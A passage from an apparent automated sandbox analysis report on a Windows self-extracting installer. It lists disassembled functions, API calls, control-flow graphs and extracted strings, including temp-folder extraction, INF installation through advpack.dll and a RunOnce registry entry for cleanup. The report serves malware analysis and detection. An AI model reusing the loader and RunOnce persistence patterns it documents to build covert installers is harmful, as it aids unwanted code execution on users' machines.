                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,003E8C42), ref: 003E3D8F
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 003E3E26
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,003E8C42), ref: 003E3EFF
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,003E8C42), ref: 003E3F1F
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,003E8C42), ref: 003E3F40
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,003E8C42), ref: 003E3F47
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,003E8C42), ref: 003E3F76
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,003E8C42), ref: 003E3F80
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,003E8C42), ref: 003E3FC2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$valid
                                                                                                                                                                                                                                                            • API String ID: 1032054927-3128773406
                                                                                                                                                                                                                                                            • Opcode ID: a3882a7b3f90733789254028f7613ec44c5b2c2906199331cf4ae3a34a0e6149
                                                                                                                                                                                                                                                            • Instruction ID: 256e7ab98321d358e73c54b97e870c62efcd1b29e905cc0a19f9e66b525899e6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3882a7b3f90733789254028f7613ec44c5b2c2906199331cf4ae3a34a0e6149
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52B192709083E19BD7339F26888976B76E8EB84750F110B29FA85DB2D0D770DD45CB52
                                                                                                                                                                                                                                                            Function 003E1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 141 3e1ae8-3e1b2c call 3e1680 144 3e1b2e-3e1b39 141->144 145 3e1b3b-3e1b40 141->145 146 3e1b46-3e1b61 call 3e1a84 144->146 145->146 149 3e1b9f-3e1bc2 call 3e1781 call 3e658a 146->149 150 3e1b63-3e1b65 146->150 159 3e1bc7-3e1bd3 call 3e66c8 149->159 152 3e1b68-3e1b6d 150->152 152->152 154 3e1b6f-3e1b74 152->154 154->149 155 3e1b76-3e1b7b 154->155 157 3e1b7d-3e1b81 155->157 158 3e1b83-3e1b86 155->158 157->158 160 3e1b8c-3e1b9d call 3e1680 157->160 158->149 161 3e1b88-3e1b8a 158->161 166 3e1bd9-3e1bf1 CompareStringA 159->166 167 3e1d73-3e1d7f call 3e66c8 159->167 160->159 161->149 161->160 166->167 169 3e1bf7-3e1c07 GetFileAttributesA 166->169 174 3e1df8-3e1e09 LocalAlloc 167->174 175 3e1d81-3e1d99 CompareStringA 167->175 170 3e1c0d-3e1c15 169->170 171 3e1d53-3e1d5e 169->171 170->171 173 3e1c1b-3e1c33 call 3e1a84 170->173 176 3e1d64-3e1d6e call 3e44b9 171->176 187 3e1c35-3e1c38 173->187 188 3e1c50-3e1c61 LocalAlloc 173->188 179 3e1e0b-3e1e1b GetFileAttributesA 174->179 180 3e1dd4-3e1ddf 174->180 175->174 178 3e1d9b-3e1da2 175->178 192 3e1e94-3e1ea4 call 3e6ce0 176->192 183 3e1da5-3e1daa 178->183 184 3e1e1d-3e1e1f 179->184 185 3e1e67-3e1e73 call 3e1680 179->185 180->176 183->183 189 3e1dac-3e1db4 183->189 184->185 191 3e1e21-3e1e3e call 3e1781 184->191 198 3e1e78-3e1e84 call 3e2aac 185->198 194 3e1c3a 187->194 195 3e1c40-3e1c4b call 3e1a84 187->195 188->180 197 3e1c67-3e1c72 188->197 196 3e1db7-3e1dbc 189->196 191->198 207 3e1e40-3e1e43 191->207 194->195 195->188 196->196 202 3e1dbe-3e1dd2 LocalAlloc 196->202 203 3e1c79-3e1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 197->203 204 3e1c74 197->204 211 3e1e89-3e1e92 198->211 202->180 208 3e1de1-3e1df3 call 3e171e 202->208 209 3e1cf8-3e1d07 203->209 210 3e1cc2-3e1ccc 203->210 204->203 207->198 212 3e1e45-3e1e65 call 3e16b3 * 2 207->212 208->211 213 3e1d09-3e1d21 GetShortPathNameA 209->213 214 3e1d23 209->214 216 3e1cce 210->216 217 3e1cd3-3e1cf3 call 3e1680 * 2 210->217 211->192 212->198 219 3e1d28-3e1d2b 213->219 214->219 216->217 217->211 224 3e1d2d 219->224 225 3e1d32-3e1d4e call 3e171e 219->225 224->225 225->211
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 003E1BE7
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 003E1BFE
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 003E1C57
                                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 003E1C88
                                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,003E1140,00000000,00000008,?), ref: 003E1CB8
                                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 003E1D1B
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                            • API String ID: 383838535-852641736
                                                                                                                                                                                                                                                            • Opcode ID: 6190d037314ef67f6031b6e7d1839533ab6c3727f6c33bca2f1c6308cf874dbd
                                                                                                                                                                                                                                                            • Instruction ID: 391c7d99f2b0fd249f8f287a409745d1434dcc19ce1c24824f6bd796693b34f1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6190d037314ef67f6031b6e7d1839533ab6c3727f6c33bca2f1c6308cf874dbd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03A13671A002F86BEF239B26CC45BFA77699B95310F1403A9F555AB2C0DBB09E85CB50
                                                                                                                                                                                                                                                            Function 003E2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 466 3e2f1d-3e2f3d 467 3e2f3f-3e2f46 466->467 468 3e2f6c-3e2f73 call 3e5164 466->468 470 3e2f5f call 3e3a3f 467->470 471 3e2f48 call 3e51e5 467->471 477 3e2f79-3e2f80 call 3e55a0 468->477 478 3e3041 468->478 476 3e2f64-3e2f66 470->476 475 3e2f4d-3e2f4f 471->475 475->478 480 3e2f55-3e2f5d 475->480 476->468 476->478 477->478 485 3e2f86-3e2fbe GetSystemDirectoryA call 3e658a LoadLibraryA 477->485 479 3e3043-3e3053 call 3e6ce0 478->479 480->468 480->470 488 3e2ff7-3e3004 FreeLibrary 485->488 489 3e2fc0-3e2fd4 GetProcAddress 485->489 491 3e3006-3e300c 488->491 492 3e3017-3e3024 SetCurrentDirectoryA 488->492 489->488 490 3e2fd6-3e2fee DecryptFileA 489->490 490->488 501 3e2ff0-3e2ff5 490->501 491->492 493 3e300e call 3e621e 491->493 494 3e3026-3e303c call 3e44b9 call 3e6285 492->494 495 3e3054-3e305a 492->495 505 3e3013-3e3015 493->505 494->478 497 3e305c call 3e3b26 495->497 498 3e3065-3e306c 495->498 507 3e3061-3e3063 497->507 503 3e306e-3e3075 call 3e256d 498->503 504 3e307c-3e3089 498->504 501->488 514 3e307a 503->514 509 3e308b-3e3091 504->509 510 3e30a1-3e30a9 504->510 505->478 505->492 507->478 507->498 509->510 515 3e3093 call 3e3ba2 509->515 512 3e30ab-3e30ad 510->512 513 3e30b4-3e30b7 510->513 512->513 517 3e30af call 3e4169 512->517 513->479 514->504 520 3e3098-3e309a 515->520 517->513 520->478 521 3e309c 520->521 521->510
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 003E2F93
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 003E2FB2
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 003E2FC6
                                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 003E2FE6
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 003E2FF8
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 003E301C
                                                                                                                                                                                                                                                              • Part of subcall function 003E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F4D,?,00000002,00000000), ref: 003E5201
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                            • API String ID: 2126469477-2099937843
                                                                                                                                                                                                                                                            • Opcode ID: e4510c22b9fb56c34463472582a64f67ed80b73788bf36a632afa9c2f3a388be
                                                                                                                                                                                                                                                            • Instruction ID: 2e27227ac5350b4b53a061d1143bf75e72c9754f211a917c9f857d341be4423e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4510c22b9fb56c34463472582a64f67ed80b73788bf36a632afa9c2f3a388be
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7741B030A002F59ADB33AB339D8976A37AC9B54750F01077AE906DB1D1EB74DE80CA61
                                                                                                                                                                                                                                                            Function 003E2390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,003E8A3A,003E11F4,003E8A3A,00000000,?,?), ref: 003E23F6
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,003E11F8), ref: 003E2427
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,003E11FC), ref: 003E243B
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 003E2495
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 003E24A3
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003E24AF
                                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 003E24BE
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(003E8A3A), ref: 003E24C5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                                            • Opcode ID: 3be5b88ee457eb0ba71edbbe2fed946b2b3c190d6a4fbe44141fdf8b6b0152f1
                                                                                                                                                                                                                                                            • Instruction ID: 9afee27320b18ec8dcf59e1f589c192dd4d30e275a6239c79c33b40bb3166a36
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3be5b88ee457eb0ba71edbbe2fed946b2b3c190d6a4fbe44141fdf8b6b0152f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A3174316046D09BD332DB66CC8AEEB73ACAFC4315F044B2DF5558A2D0EB74A9098B52
                                                                                                                                                                                                                                                            Function 003E2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C03
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C18
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 003E2C28
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,003E6BB0,003E0000,00000000,00000002,0000000A), ref: 003E2C98
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                            • Opcode ID: eb03d823a30a099404c6a6741cdc1b42db41819bbe52acedb054eec737daf81c
                                                                                                                                                                                                                                                            • Instruction ID: 337d524b721fe9eaa3650803c0ff281236dad8c2fe1a1b3605dd3b3d343966db
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb03d823a30a099404c6a6741cdc1b42db41819bbe52acedb054eec737daf81c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B11E0316006E59BCB336BB7ECC8AAF375D9B84380F260725F904EB2D0CA30EC018661
                                                                                                                                                                                                                                                            Function 003E202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003E2050
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003E205F
                                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 003E208C
                                                                                                                                                                                                                                                              • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E20C9
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E20EA
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 003E2103
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2122
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 003E2134
                                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2144
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 003E215B
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E218C
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E21C1
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E21E4
                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 003E223D
                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2249
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003E2250
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                                            • API String ID: 178549006-2699677747
                                                                                                                                                                                                                                                            • Opcode ID: 4c79ae39a14f8a5460e8a03e70be1643de9eb623d1b1a0a570623f4cea4b3e62
                                                                                                                                                                                                                                                            • Instruction ID: 5c0d928aa5239ee7c2cf9c1d7a1fad28f56cd18caf8faebd869b15edf627a0e6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c79ae39a14f8a5460e8a03e70be1643de9eb623d1b1a0a570623f4cea4b3e62
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6151FD719002B4ABDB339B62DC89FEB772CEB55700F0103A4FA49EA1D1DA719E458B50
                                                                                                                                                                                                                                                            Function 003E55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 232 3e55a0-3e55d9 call 3e468f LocalAlloc 235 3e55fd-3e560c call 3e468f 232->235 236 3e55db-3e55f1 call 3e44b9 call 3e6285 232->236 242 3e560e-3e5630 call 3e44b9 LocalFree 235->242 243 3e5632-3e5643 lstrcmpA 235->243 248 3e55f6-3e55f8 236->248 242->248 246 3e564b-3e5659 LocalFree 243->246 247 3e5645 243->247 250 3e565b-3e565d 246->250 251 3e5696-3e569c 246->251 247->246 252 3e58b7-3e58c7 call 3e6ce0 248->252 255 3e565f-3e5667 250->255 256 3e5669 250->256 253 3e589f-3e58b5 call 3e6517 251->253 254 3e56a2-3e56a8 251->254 253->252 254->253 260 3e56ae-3e56c1 GetTempPathA 254->260 255->256 257 3e566b-3e567a call 3e5467 255->257 256->257 269 3e589b-3e589d 257->269 270 3e5680-3e5691 call 3e44b9 257->270 264 3e56f3-3e5711 call 3e1781 260->264 265 3e56c3-3e56c9 call 3e5467 260->265 274 3e586c-3e5890 GetWindowsDirectoryA call 3e597d 264->274 275 3e5717-3e5729 GetDriveTypeA 264->275 272 3e56ce-3e56d0 265->272 269->252 270->248 272->269 276 3e56d6-3e56df call 3e2630 272->276 274->264 289 3e5896 274->289 278 3e572b-3e572e 275->278 279 3e5730-3e5740 GetFileAttributesA 275->279 276->264 290 3e56e1-3e56ed call 3e5467 276->290 278->279 282 3e5742-3e5745 278->282 279->282 283 3e577e-3e578f call 3e597d 279->283 287 3e576b 282->287 288 3e5747-3e574f 282->288 297 3e57b2-3e57bf call 3e2630 283->297 298 3e5791-3e579e call 3e2630 283->298 291 3e5771-3e5779 287->291 288->291 294 3e5751-3e5753 288->294 289->269 290->264 290->269 295 3e5864-3e5866 291->295 294->291 299 3e5755-3e5762 call 3e6952 294->299 295->274 295->275 307 3e57d3-3e57f8 call 3e658a GetFileAttributesA 297->307 308 3e57c1-3e57cd GetWindowsDirectoryA 297->308 298->287 306 3e57a0-3e57b0 call 3e597d 298->306 299->287 309 3e5764-3e5769 299->309 306->287 306->297 314 3e580a 307->314 315 3e57fa-3e5808 CreateDirectoryA 307->315 308->307 309->283 309->287 316 3e580d-3e580f 314->316 315->316 317 3e5827-3e585c SetFileAttributesA call 3e1781 call 3e5467 316->317 318 3e5811-3e5825 316->318 317->269 323 3e585e 317->323 318->295 323->295
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003E55CF
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 003E5638
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003E564C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003E5620
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                              • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 003E56B9
                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 003E571E
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 003E5737
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003E57CD
